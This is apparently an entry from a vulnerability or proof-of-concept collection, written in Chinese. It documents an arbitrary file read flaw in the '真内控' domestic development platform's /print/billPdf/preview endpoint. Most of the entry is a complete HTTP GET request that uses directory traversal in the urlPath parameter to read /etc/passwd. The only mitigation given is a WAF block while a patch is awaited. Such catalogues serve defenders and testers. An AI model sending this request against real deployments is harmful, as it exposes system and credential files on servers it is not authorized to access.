vendor = "真内控"
name = "真内控国产化开发平台 preview 任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/print/billPdf/preview"
detail = "GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
